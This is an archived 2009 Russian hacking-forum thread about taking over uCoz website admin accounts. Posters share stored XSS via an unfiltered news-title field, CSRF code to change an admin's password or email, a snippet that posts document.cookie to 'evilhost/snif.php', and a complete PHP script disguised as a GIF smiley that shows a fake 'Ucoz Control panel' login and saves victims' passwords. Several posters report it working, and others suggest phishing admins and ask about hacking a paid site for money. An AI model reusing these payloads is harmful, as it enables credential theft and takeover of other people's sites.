PDA

Просмотр полной версии : Найден способ взлома UcoZ!

Artemik
08.01.2009, 19:15
Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать.
Cookie админа украсть не проблема, даже если на форуме выключены HTML теги.

Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать.
Но привязка IP модератора по умолачнию выключена. ;) так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д.
По идее то нам зачастую это и нужно - насолить бедной жертве =)))
Но нам это неподходит. Двигаемся дальше.

А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =)

Именно так мы и поступим.

Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". :cool:

А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны.
А вот что! =)

Мы внедрим файл в заголовок нашей "злой" новости! :)

Создаем любой файлик. И в него вписываем код.
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
Теперь заливаем его на сайте который хотим взломать.
Это можно сделать например так:
Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное.
Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер".
Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл.

Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена.
Ну а у кого неть такой функции, придется набирать ссылку ручками =)

Теперь идем создавать новость.

Новость напишите произвольную.
Это не имеет значения, нас интересует строка "Название материала".

Туда вписываем

<script src="../путь до файла"></script>

Например у меня так:

<script src="../_fr/0/0962166.img"></script>

Видите у меня полсе ...src=" стоят 2 точки?
Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы).

И вуаля! пароль изменен нам на нужный :cool:

Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах))

Если кто может сделать этот код, то пишите тут!
Собственно для этого я и сделал тему)

Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан :o

AkyHa_MaTaTa
08.01.2009, 19:37
я конечно не знаком с системой ucoz, но вроде везде где идет смена пароля требуеться вести старый для подтвержения.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Вот самый простинкий ajax запрос:

url="admin.php";// адрес куда будем передовать

function sendRequest(params)// в params переменые передоваемы в пост запросе
{
if(params!==""){
req=initXMLHTTPRequest();
if (req)
{
req.onreadystatechange=somedo;
req.open("POST",url,true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);}
}
}

function initXMLHTTPRequest()
{
var xRequest=null;
if (window.XMLHttpRequest){
xRequest=new XMLHttpRequest();
} else if (window.ActiveXObject){
xRequest=new ActiveXObject
("Microsoft.XMLHTTP");
}
return xRequest;
}

function somedo()
{

}

Artemik
08.01.2009, 19:57
А ты можешь его подогнать под конкретно Укоз?

AkyHa_MaTaTa
08.01.2009, 20:00
А ты можешь его подогнать под конкретно Укоз?
Зарегай мне акк на укозе, или дай какойто, я хз че там передаеться.

iddqd
08.01.2009, 20:00
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)

AkyHa_MaTaTa
08.01.2009, 20:08
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)

[Raz0r]
08.01.2009, 20:14
Код мы вписали.
ТС, ActiveX работает только в IE.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.

Универсальный способ отправить POST-запрос с помощью html и js:
<iframe width=0 height=0 id=lol name=lol></iframe>
// создаем невидимый iframe для того, чтобы отправка формы не вызывала перезагрузку страницы
<form name=myform method=post target=lol>
// создаем форму, в которой target - это наш iframe
<input type=hidden name=c>
// здесь любые данные, в данном случае cookie
</form>
<script>
// теперь очередь js
document.myform.action='http://evilhost/snif.php';
// устанваливаем action на наш сервер
document.myform.c.value=document.cookie;
// записываем в hidden-поле данные cookie пользователя
document.myform.submit();
// отправляем форму
</script>

мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
так работать не будет! (http://en.wikipedia.org/wiki/Same_origin_policy)

dr.Pilulkin
08.01.2009, 20:29
А с помощью Flash можно отравлять запросы?

Artemik
08.01.2009, 20:37
Razor нам ненужны Куки. Нам надо, чтобы через этот пост запрос админ переходил в свой профиль, и менял свой пароль. Я точно непомню, но вроде переменная, в которой вводится праоль там называется passw. Но, я сейчас придумал другой варинат. Если неполучится изменить переменную пассв, то можно поменять не пароль а e-mail на свой. Потом сказать что ты типо забыл пароль и тебе на e-mail придет письмо. =)

Ну зарегайте любой сайт на Укозе, это быстро же и покапайтесь =)

ucoz.ru

Но, я вроде уже придумал код, но сегодня выложить немогу, ждите до завтра )))))

AkyHa_MaTaTa
08.01.2009, 20:39
']

Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
так работать не будет![/url]

БРЕД, ТАК РАБОТАТЬ БУДЕТ,И ЭТО МНОЮ УЖЕ ПРОВЕРЯЛОСЬ НЕ ОДНОКРАТНО!!! ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да, этого сделать не получиться. ЕСЛИ НЕ ВЕРИТЕ Я МОГУ УСТРОИТЬ МАЛЕНЬКУЮ ДЕМОНТСРАЦИЮ ЭТОГО
Вот почитайте
http://javascript.ru/ajax/cross-domain-scripting

Наиболее известный транспорт, позволяет такие запросы - это SCRIPT, т.к <script src="..."> может подгружать яваскрипт с любого домена.
']
ТС, ActiveX работает только в IE.

мм, если вы подразумеваете что XMLHTTPRequest в старых браузерах от ие был не native object а вызывался через ActiveX, то да, но если вы посмотрите на код, то там идет проверка на это, в остальных браузерах с подержкой XMLHTTPRequest он идет как native object и в новых версиях ИЕ.

Artemik
08.01.2009, 20:46
Возможно запрос будет выглядеть так (полный код на 1 странице давал "Какуна Матата")

......
if(params!==passw="123456"){
if (req)
{
.....
Или нет?
Если нам нужно отправить переменнуб passw то как будет выглядеть код?

AkyHa_MaTaTa
08.01.2009, 20:51
Возможно запрос будет выглядеть так (полный код на 1 странице давал "Какуна Матата")

......
if(params!==passw="123456"){
if (req)
{
.....
Или нет?
Если нам нужно отправить переменнуб passw то как будет выглядеть код?
не, немного не так,
sendRequest("passw=123456");

Chrome~
08.01.2009, 20:58
Я бы не назвал это столь большой новостью. На uCoz и правда не идет запрос на ввод старого пароля, при установке нового. Также при изменении инфы не требуется вводить капчу. Давно замечал это.

Передача новых личных данных идет в формате multipart/form-data и передается довольно много параметров.

Artemik
08.01.2009, 21:11
Я бы не назвал это столь большой новостью. На uCoz и правда не идет запрос на ввод старого пароля, при установке нового. Также при изменении инфы не требуется вводить капчу. Давно замечал это.

А это и никто и не называет большой новостью. Большой новостью называют, то что можно через запросы сменить пароль админа. Или его е-мэил.

AkyHa_MaTaTa
08.01.2009, 21:12

Передача новых личных данных идет в формате multipart/form-data и передается довольно много параметров.
multipart/form-data - для передачи файлов а вот так в форме - application/x-www-form-urlencoded

[Raz0r]
08.01.2009, 21:14
ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да
именно про это я и говорил

AkyHa_MaTaTa
08.01.2009, 21:16
']именно про это я и говорил
']Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
Ну может я вас не правильно понял, или вы меня.

Artemik
08.01.2009, 21:33
Ну может я вас не правильно понял, или вы меня.

Матата, он имел ввиду что нужно указывать ссылку на скрипт находящийся в пределах хоста. А в самом скрипте можно указывать на любой скрипт.

Я так понял)))

Artemik
08.01.2009, 21:40
И не забывайте, что Укоз не поддерживает PHP!

AkyHa_MaTaTa
08.01.2009, 21:49
Матата, он имел ввиду что нужно указывать ссылку на скрипт находящийся в пределах хоста. А в самом скрипте можно указывать на любой скрипт.

Я так понял)))
Ты понял все с точностью до наоборот. Как раз сылку в src можно указывать на любой хост а в самом скрипте при XMLHTTPRequest только на данный домен до буковки, то есть www.test.ru и test.ru уже будут считаться разными доменами, поэтому лутчше всегда узать location.host

Artemik
08.01.2009, 21:52
Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт?
Я капнул в исходниках.
Вот.

<tr id="siM54"><td class="manTd1" id="siM55">E-mail адрес <font color="#FF0000" class="manStar">*</font>:</td><td class="manTd2" id="siM56"><input type="text" id="siF17" class="manFlaEmail" name="email" size="20" style="width:100%;" value="mailadmina@yandex.ru" maxlength="60" onChange="alert('Проверьте правильность вашего Email адреса, на этот адрес будет выслано письмо с кодом подтверждения. Если не подтвердить email, то любая активность, для которой используется электронная почта, будет заблокирована для вас.');" /></td></tr><tr><td height="10" class="manTdSep" colspan="2"><hr class="manHr" /></td></tr>

На основе этого, мог бы ты сделать POST-запрос с помощью html и js?

Я посмотрел твой код на 2 странице, но я плохо понял(

AkyHa_MaTaTa
08.01.2009, 21:55
Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт?
Я капнул в исходниках.
Вот.

На основе этого, мог бы ты сделать POST-запрос с помощью html и js?

Я посмотрел твой код на 2 странице, но я плохо понял(
с учетом того что я тебе написал

sendRequest("email=mailadmina@yandex.ru");

а url - укажи action

Вобшем создаешь скрипт файл, например, admin.js
в нем

function sendRequest(params)// в params переменые передоваемы в пост запросе
{
if(params!==""){
if (req)
{
req.open("POST",url,true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);}
}
}

function initXMLHTTPRequest()
{
var xRequest=null;
if (window.XMLHttpRequest){
xRequest=new XMLHttpRequest();
} else if (window.ActiveXObject){
xRequest=new ActiveXObject
("Microsoft.XMLHTTP");
}
return xRequest;
}

url="сдесь содержимое action, или если оно пустое или не указано адрес скрипта где форма находиться";

sendRequest("email=mailadmina@yandex.ru");

Chrome~
08.01.2009, 23:14
А это и никто и не называет большой новостью. Большой новостью называют, то что можно через запросы сменить пароль админа. Или его е-мэил.
Я как раз о смене пароля с помощью запросов, но говорю об этом с другой стороны.

Chrome~
08.01.2009, 23:24
multipart/form-data - для передачи файлов а вот так в форме - application/x-www-form-urlencoded
Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.

AkyHa_MaTaTa
09.01.2009, 04:11
Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.
Ну, не стоит считать что если у тебя так то у других также, судя по пакетам которые отсылаються у меня то в фф именно application/x-www-form-urlencoded, в других не смотрел, может это зависит от браузера.

Artemik
09.01.2009, 11:22
Какуна матата, я попробовал твой способ. У меня все равно ничего что то неполучается.
Давай я зарегестрирую тебе сайт на UcoZ и ты сам попробуешь?

3dn
09.01.2009, 14:17
1. Кража куков модератора ничего не даст, потому что куки на другом компьютере работать не будут (если защита).
2. Сделать автоформу для того чтобы модератор изменил пароль админа не выйдет по 2 причинам:
a) модератор не может менять пароли других пользователей
b) при редактировании данных проверяется реферер (отключите передачу рефереров в опере и сами попробуйте свой профиль отредактировать).

Чтобы в дальнейшем не возникало подобных тем и желаний создавать автоформы для подобных действий, после обновления системы uCoz, в форму редактирования профиля будет добавлена капча....

Благодарю за сотрудничество ;)

Artemik
09.01.2009, 15:42
3dn не модератор будет изменять данные админу! А сам админ!!!

3dn
09.01.2009, 23:02
не модератор будет изменять данные админу! А сам админ!!!
суть не меняется, админ не сможет автоформу отправить чтобы изменить свой пароль... делается проверка реферера, в котором проверяется точный адрес страницы с которой можно редактировать...

N19hTW0lF
09.01.2009, 23:11
А с помощью Flash можно отравлять запросы?
можно

dinar_007
09.01.2009, 23:32
1. Кража куков модератора ничего не даст, потому что куки на другом компьютере работать не будут (если защита).
2. Сделать автоформу для того чтобы модератор изменил пароль админа не выйдет по 2 причинам:
a) модератор не может менять пароли других пользователей
b) при редактировании данных проверяется реферер (отключите передачу рефереров в опере и сами попробуйте свой профиль отредактировать).

Чтобы в дальнейшем не возникало подобных тем и желаний создавать автоформы для подобных действий, после обновления системы uCoz, в форму редактирования профиля будет добавлена капча....

Благодарю за сотрудничество ;)
Ты работаешь на этом хостинге?
Админ? Разведчик? :(

AkyHa_MaTaTa
10.01.2009, 00:08
суть не меняется, админ не сможет автоформу отправить чтобы изменить свой пароль... делается проверка реферера, в котором проверяется точный адрес страницы с которой можно редактировать...
с помошью флеш вроде можно менять одельно взятые заголовки, правдо только 8-7 версией flash
Ты работаешь на этом хостинге?
Админ? Разведчик? :(
он засланый казачек, бей его... шютка :)

Rebit
10.01.2009, 00:23
Так який ж з способов рабочий на 100 % ?

3dn
10.01.2009, 03:09
Так який ж з способов рабочий на 100 % ?
пробуйте всякие, может что-то получится :)

AkyHa_MaTaTa
10.01.2009, 03:54
Да еше один из вариантов - это использовать java Aplet, и если например соединение с сервером делать посредством Socket - то можно писать ЛЮБОЙ HTTP заголовок
вот например так

Socket socket = new Socket(host, port) ;
BufferedReader reader = new BufferedReader(
new InputStreamReader(socket.getlnputstream()));
PrintWriter writer = new PrintWriter(
socket.getOutputStream() ) ;
writer.print('GET /ddd.php?key=ashgdhagsdhfjasfdfasdasdasdasd HTTP/1.1\r\nUser-Agent: Fuck Off\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nHost: www.test1.ru\r\nConnection: Close\r\n\r\n') ;
writer.flush() ;
socket.shutdownOutput();
String line;
while((line = reader.readLine()) != null)
socket.close() ;

Но тут есть одно но, ip адресс откуда скачиваеться java applet должен совпадать с ip куда идет обрашения appleta, зато можно посылать запросы к любому хосту находяшимуся на даном ip, ведь сервер оличает к какому хосту мы обрашаемся по Host: HTTP заголовка, ну и естествено у жертвы должна присутствывать подержка java в браузере.

Nitrogeniys
11.01.2009, 21:50
Socket socket = new Socket(host, port) ;
BufferedReader reader = new BufferedReader(
new InputStreamReader(socket.getlnputstream()));
PrintWriter writer = new PrintWriter(
socket.getOutputStream() ) ;
writer.print('GET /ddd.php?key=ashgdhagsdhfjasfdfasdasdasdasd HTTP/1.1\r\nUser-Agent: Fuck Off\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nHost: www.test1.ru\\nConnection: Close\r\n\r\n') ;
writer.flush() ;
socket.shutdownOutput();
String line;
while((line = reader.readLine()) != null)
socket.close() ;
Чёто не вкатило у меня!
Есть ещё у кого нить идейки?

AkyHa_MaTaTa
12.01.2009, 23:36
Чёто не вкатило у меня!
Есть ещё у кого нить идейки?
Это я JAVA applet, не стоит все понимать буквально и тыкать в браузер, я выложил просто для примера.

Artemik
19.01.2009, 19:33
Удалите тему плиз.

NooB MC
02.02.2009, 23:09
Попробуйте кто нибудь через мини чат пробиться...
Я пока толком не знаю как составить запрос,
сегодня пришли куки админа:

REFERER: http://*****.ru/***.img
QUERY: 58&
AGENT: Opera/9.52 (Windows NT 5.1; U; MRA 5.3 (build 02560); ru)

Буду пробовать ещё, но если кто знает, посоветуйте как написать код.

Artemik
15.02.2009, 17:12
Куки админа ничего не дадут. В Укозе по умолчанию стоит у админов привязка к IP.

cash$$$
15.02.2009, 17:32
to NooB MC

Есть такой способ:

Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

После этого сохраняем файл под названием smile, потом меняем расширение на gif.
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:

[I*MG]http://mysite.phphost.net/smile.gif[/I*MG]

Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.

Ps: Но этот баг, наверное, уже прикрыли...

playhard.g0pr0
16.02.2009, 21:16
to NooB MC

Есть такой способ:

попробовал на своем сайте все работает

Rebit
17.02.2009, 13:07
to NooB MC

Есть такой способ:

Работа но не на всех сайтах

Nakq
25.02.2009, 18:57
Молодцы! Спс!

ben1991
27.02.2009, 02:07
а если я вошол в аккаунт админа , но не главного а второстепенного, я могу редактировать шаблоны но немогу зайти в админку.Какие скрипты применить чтобы найти пароли других админов и админки?

BlackDraG
27.02.2009, 15:38
Дефейс логина?
Чтобы отсылал на хост с php скриптом.

nik3241
31.03.2009, 19:42
Дефейс логина?
Чтобы отсылал на хост с php скриптом.

ну или фейк авторизации, успех в том случае если включен img, старый способ но по сей день актуальный, хотя в админке укоза img по дефолту вроде отключен

sarmat2009
07.04.2009, 23:43
Смайл, кстати можно не только в миничат отправлять (в сообщении на форуме к примеру);)

jenyavlg
08.04.2009, 14:17
льем на фтп скрипт
А где сам скрипт

-=$MiRoN$=-
17.04.2009, 01:27
СПС! Всё дествительно работает!

L7ife
29.06.2009, 21:33
Сижу,читаю,жру.Вот вы сменили пасы ну и х... с того если есть "секретный код или чёт типа этого (непомнб как точно называется)",макситмум что вы сделаете,то только попортите сайт,по если ещё админ не лох(делает бэкап 1 раз в неделю и хранит у себя на компе)..........

Drunya
03.07.2009, 14:00
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:

ээ.. чета вот попробовал я на двух своих сайтах и баян... файл с расширением gif не интерпретируются пхп интерпретатором.
Просто пишет мол картинка повреждена... если попытаться запустить ее прямо с хоста с пхп, а на юкозе просто не отображаецо. Делал все по инструкции, хотя там и делать нечего:) Подскажите, может дыманул я...
Ах да при этом нормальные картинки с левых хостов отображаются....Как я понял вся проблема в файл с расширением gif не интерпретируются пхп интерпретатором.

seofilms
12.07.2009, 22:05

Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.

Ps: Но этот баг, наверное, уже прикрыли...
Да ты прав, этот баг уже прикрыли, но есть то что они еще незаметили ))) можно написать тоже самое в личном сообщении админу и если он будет дураком то введет свой логин и пароль, 4 человка из 20 вводят ;) в основном на малопосещяемых сайтах ;) так что дерзайте )))

seval
25.01.2010, 13:01
Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать.
Cookie админа украсть не проблема, даже если на форуме выключены HTML теги.

Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать.
Но привязка IP модератора по умолачнию выключена. ;) так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д.
По идее то нам зачастую это и нужно - насолить бедной жертве =)))
Но нам это неподходит. Двигаемся дальше.

А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =)

Именно так мы и поступим.

Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". :cool:

А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны.
А вот что! =)

Мы внедрим файл в заголовок нашей "злой" новости! :)

Создаем любой файлик. И в него вписываем код.
Код мы вписали.
Теперь заливаем его на сайте который хотим взломать.
Это можно сделать например так:
Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное.
Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер".
Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл.

Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена.
Ну а у кого неть такой функции, придется набирать ссылку ручками =)

Теперь идем создавать новость.

Новость напишите произвольную.
Это не имеет значения, нас интересует строка "Название материала".

Туда вписываем

<script src="../путь до файла"></script>

Например у меня так:

<script src="../_fr/0/0962166.img"></script>

Видите у меня полсе ...src=" стоят 2 точки?
Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы).

И вуаля! пароль изменен нам на нужный :cool:

Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах))

Если кто может сделать этот код, то пишите тут!
Собственно для этого я и сделал тему)

Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан :o
А если админ отключил возможность пользователям добавлять новость?

PaRaBe1LuM
04.02.2010, 00:56
а если платный сайт на укозе? кто возьмется сломать и сколько будет стоить?